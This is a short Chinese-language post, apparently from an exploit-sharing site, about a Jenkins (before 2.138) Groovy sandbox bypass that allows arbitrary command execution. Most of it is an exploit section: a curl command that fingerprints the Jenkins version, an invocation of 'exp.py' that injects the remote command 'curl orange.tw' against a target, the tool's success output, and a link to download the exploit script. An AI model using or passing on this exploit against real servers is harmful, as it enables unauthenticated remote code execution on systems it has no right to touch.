## 漏洞概述
Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。
## 影响范围
“`http
Jenkins version < 2.138
``` ## EXP ```bash
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000 $ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
```
[点我下载 exp](/Gr33kLibrary/download_tool/73/)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容